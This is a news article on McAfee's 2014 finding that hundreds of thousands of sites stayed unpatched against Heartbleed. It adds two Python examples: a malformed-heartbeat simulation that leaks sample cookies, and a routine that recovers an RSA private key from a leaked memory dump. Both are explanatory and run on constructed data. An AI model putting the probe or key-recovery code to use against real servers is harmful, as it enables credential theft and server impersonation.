Heartbleed patch efforts ignored on thousands of websites
Data from McAfee shows many organizations have yet to fully patch the Heartbleed vulnerability, and as many as 300,000 websites remain at risk.
A cybersecurity vendor is warning that a public listing of websites susceptible to the recent Heartbleed OpenSSL vulnerability, originally compiled to help users check whether a site was safe to use, has since been used by hackers to identify unpatched sites and to keep trawling them for personal information.
In its newly released August 2014 threats report, Santa Clara-based McAfee Inc.'s McAfee Labs research team also cited an estimate that more than 300,000 websites remain unpatched and vulnerable to Heartbleed as cybercriminals successfully transformed a roster of vulnerable sites into a "hit list" to identify new attack targets.
Defining Heartbleed as "the most significant security event" since last holiday season's Target Corp. data breach, McAfee warned that the many applications, websites and devices that remain unpatched are almost certain to be attacked, "despite the plethora of available tools" for securing affected systems. Hence, Heartbleed's aftermath may well serve as "another cybercrime opportunity," the security firm warned.
A wide range of free tools and other security resources quickly emerged from vendors and security professionals after the disclosure of the Heartbleed vulnerability, known as CVE-2014-0160, on April 7. The flaw was a missing bounds check in OpenSSL's implementation of the transport layer security (TLS) heartbeat extension: a malformed heartbeat request that claims a larger payload than it actually carries makes an unpatched server (or client) answer with up to 64 KB of adjacent process memory per request, which can include session cookies, passwords and private keys. (The TLS heartbeat is a keep-alive message that lets client and server confirm that the other side is still reachable.)
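The following model of the bug is an added example written for this article; it is not OpenSSL's code or code from McAfee. It encodes a heartbeat message as RFC 6520 defines it (type, 16-bit payload_length, payload, at least 16 bytes of padding), then runs the same request through two handlers: one that mirrors the logic of OpenSSL 1.0.1 through 1.0.1f, which trusts the peer's payload_length, and one with the two length checks added in 1.0.1g. The "neighbouring heap data" and the header values inside it are constructed sample bytes, and the buffer stands in for the process heap that the real memcpy read past.

```python
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
HDR = 1 + 2          # HeartbeatMessageType (1 byte) + payload_length (2 bytes)
MIN_PADDING = 16     # RFC 6520 section 4: padding_length must be at least 16


def build_heartbeat(claimed_len: int, payload: bytes,
                    padding: bytes = b"\x00" * MIN_PADDING) -> bytes:
    """Encode a heartbeat_request. `claimed_len` is the payload_length field
    sent on the wire; a Heartbleed probe sets it larger than len(payload)."""
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + padding


def _header(record: bytes):
    return struct.unpack("!BH", record[:HDR])      # (type, payload_length)


def vulnerable_handler(memory: bytes, rec_off: int, rec_len: int):
    """Model of tls1_process_heartbeat() in OpenSSL 1.0.1 through 1.0.1f.
    payload_length comes straight from the peer's message and is never
    compared with rec_len, so the echo copies bytes that lie beyond the record."""
    hbtype, payload_len = _header(memory[rec_off:rec_off + HDR])
    if hbtype != HB_REQUEST:
        return None
    pl = rec_off + HDR
    # memcpy(bp, pl, payload): here the slice simply runs into the bytes that
    # follow the record in `memory`, as the real copy ran into the heap.
    leaked = memory[pl:pl + payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + leaked + b"\x00" * MIN_PADDING


def patched_handler(memory: bytes, rec_off: int, rec_len: int):
    """Same handler with the two length checks added in OpenSSL 1.0.1g."""
    if HDR + MIN_PADDING > rec_len:
        return None          # record cannot hold even an empty heartbeat
    hbtype, payload_len = _header(memory[rec_off:rec_off + HDR])
    if HDR + payload_len + MIN_PADDING > rec_len:
        return None          # claimed payload exceeds the record: discard silently (RFC 6520 section 4)
    if hbtype != HB_REQUEST:
        return None
    pl = rec_off + HDR
    echoed = memory[pl:pl + payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * MIN_PADDING


def response_payload(resp: bytes) -> bytes:
    """Return the payload a heartbeat_response carries (header and padding stripped)."""
    _, n = _header(resp)
    return resp[HDR:HDR + n]


def simulate(claimed_len: int, payload: bytes = b"hi"):
    """Place a heartbeat record in front of some constructed 'neighbouring heap
    data' and return what each handler echoes back (None = request dropped)."""
    record = build_heartbeat(claimed_len, payload)
    neighbour = (b"GET /account HTTP/1.1\r\nCookie: session=3f9a1c77\r\n"
                 b"Authorization: Basic YWRtaW46aHVudGVyMg==\r\n")   # constructed sample
    memory = record + neighbour
    vuln = vulnerable_handler(memory, 0, len(record))
    fixed = patched_handler(memory, 0, len(record))
    return (response_payload(vuln) if vuln is not None else None,
            response_payload(fixed) if fixed is not None else None)


if __name__ == "__main__":
    leaked, dropped = simulate(0x4000)          # claim 16 KB, send 2 bytes
    print("vulnerable server echoed:", leaked)
    print("patched server echoed:", dropped)
    print("well-formed request, patched server:", simulate(2)[1])
```

With a claimed length of 0x4000 the vulnerable handler hands back the two real payload bytes followed by everything that happens to sit after the record, here the constructed cookie and Authorization header; the patched handler drops the request without responding, which is also why a scanner can tell patched from unpatched hosts: a well-formed heartbeat is answered by both, a malformed one only by the vulnerable build.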
Given how widely OpenSSL is deployed on commercial servers, McAfee estimated that Heartbleed affected about 17% of websites using TLS, including some of the most visited sites on the Internet, although it did not name them.
Heartbleed tools: Interest waning?
The McAfee report went on to document a familiar scenario: The widely publicized vulnerability quickly generated a large number of free tools and resources to help secure affected sites, but use of those tools appeared to decline rapidly.
For example, McAfee's free Stinger scanning tool was used more than 200,000 times on April 14, one week after Heartbleed surfaced, and daily use remained above 200,000 the next day, April 15. By April 18, however, McAfee said daily scans with the tool had plummeted to fewer than 50,000.
Another free tool, called "heartleech," tests a host for the Heartbleed vulnerability, then saves the leaked memory and scans it for private keys. McAfee said the tool, published on GitHub, also sidesteps some forms of intrusion detection, so network administrators can both confirm that a server is vulnerable and see whether its private key can actually be extracted.
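How a leaked memory dump is searched for a private key, as an added example written for this article (it is not heartleech's code, and the dump is constructed): the attacker already holds the public modulus N from the server's certificate, so no primality test is needed; any window of bytes that, read as an integer, divides N is one of the two RSA primes, and the whole private key follows from it. The example assumes OpenSSL's in-memory BIGNUM layout on a 64-bit little-endian host (little-endian 8-byte limbs, zero-padded to whole limbs) and uses two Mersenne primes in place of a realistic 2048-bit key so the arithmetic stays exact and fast.

```python
# Two Mersenne primes stand in for a real RSA key pair (both are known primes,
# so the arithmetic below is exact); a production key would use 1024-bit primes.
P = 2**107 - 1
Q = 2**127 - 1
E = 65537
N = P * Q                 # the public modulus, readable from the server's certificate
LIMB = 8                  # bytes per BN_ULONG on a 64-bit OpenSSL build (assumption)


def bn_bytes(x: int) -> bytes:
    """Lay x out as OpenSSL's BIGNUM keeps it on a little-endian 64-bit host:
    little-endian limbs, zero-padded to a whole number of limbs."""
    nbytes = (x.bit_length() + 7) // 8
    nlimbs = (nbytes + LIMB - 1) // LIMB
    return x.to_bytes(nlimbs * LIMB, "little")


def leaked_memory() -> bytes:
    """Constructed stand-in for a saved Heartbleed dump: filler bytes with the
    limb buffer of one RSA prime sitting somewhere inside."""
    filler = bytes(range(256)) * 2
    return filler[:300] + bn_bytes(P) + filler[300:]


def find_factor(dump: bytes, n: int):
    """Slide a window as wide as half the modulus (in limbs) over the dump and
    test every byte offset as a little-endian integer. Anything strictly
    between 1 and n that divides n must be one of the two primes."""
    n_limbs = ((n.bit_length() + 7) // 8 + LIMB - 1) // LIMB
    width = max(1, n_limbs // 2) * LIMB
    for off in range(len(dump) - width + 1):
        cand = int.from_bytes(dump[off:off + width], "little")
        if 1 < cand < n and n % cand == 0:
            return cand, off
    return None


def recover_private_key(dump: bytes, n: int, e: int):
    """From one recovered prime, rebuild the full private key (p, q, d)."""
    hit = find_factor(dump, n)
    if hit is None:
        return None
    p, _ = hit
    q = n // p
    d = pow(e, -1, (p - 1) * (q - 1))     # modular inverse, Python 3.8+
    return p, q, d


if __name__ == "__main__":
    dump = leaked_memory()
    hit = find_factor(dump, N)
    print("prime found at offset", None if hit is None else hit[1])
    print("private key recovered:", recover_private_key(dump, N, E) is not None)
```

The scan checks every byte offset rather than only limb-aligned ones because a heartbeat response returns an arbitrary slice of the heap, so the leaked limb buffer can start anywhere in the saved data. A dump that contains no prime yields no divisor and the function returns None.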
Despite the broad availability of such defensive tools, offensive ones soon followed. Project Un1c0rn, for example, set out to make the public IP addresses of vulnerable hosts searchable, effectively turning the list of exposed sites into a target list.
"Although it is likely that nearly all of the world's most important websites have been patched for Heartbleed, a large number of small-site owners … are still unaware that they are vulnerable," the McAfee report warned.
'Potentially vulnerable targets' still high
In the aftermath of the Heartbleed disclosure, McAfee said it ran a search and found 2,440 "potentially vulnerable targets." However, at least one security analyst, Robert Graham of Errata Security, has warned that perhaps 300,000 sites remain vulnerable.
A July report from key management technology vendor Venafi Inc. showed that 99% of the 460,000 Heartbleed-vulnerable hosts at Global 2000 organizations had been patched, but most of those organizations had not generated new private keys, issued new certificates or revoked the old ones. Because an attacker may already have pulled the private key out of a host while it was unpatched, all three steps are necessary to completely remediate Heartbleed.
Graham reported in a June 21 blog post that his firm had identified 600,000 vulnerable systems immediately after Heartbleed was disclosed. A scan just over two months later still found 309,197 vulnerable systems, Graham said.
"This indicates people have stopped even trying to patch," he added. "We should see a slow decrease over the next decade, as older systems are slowly replaced. Even a decade from now, though, I still expect to find thousands of systems, including critical ones, still vulnerable [to Heartbleed]."
- Expert Nick Lewis says Heartbleed offers lessons in incident response.
- Learn how the University of Michigan managed its successful Heartbleed patching effort.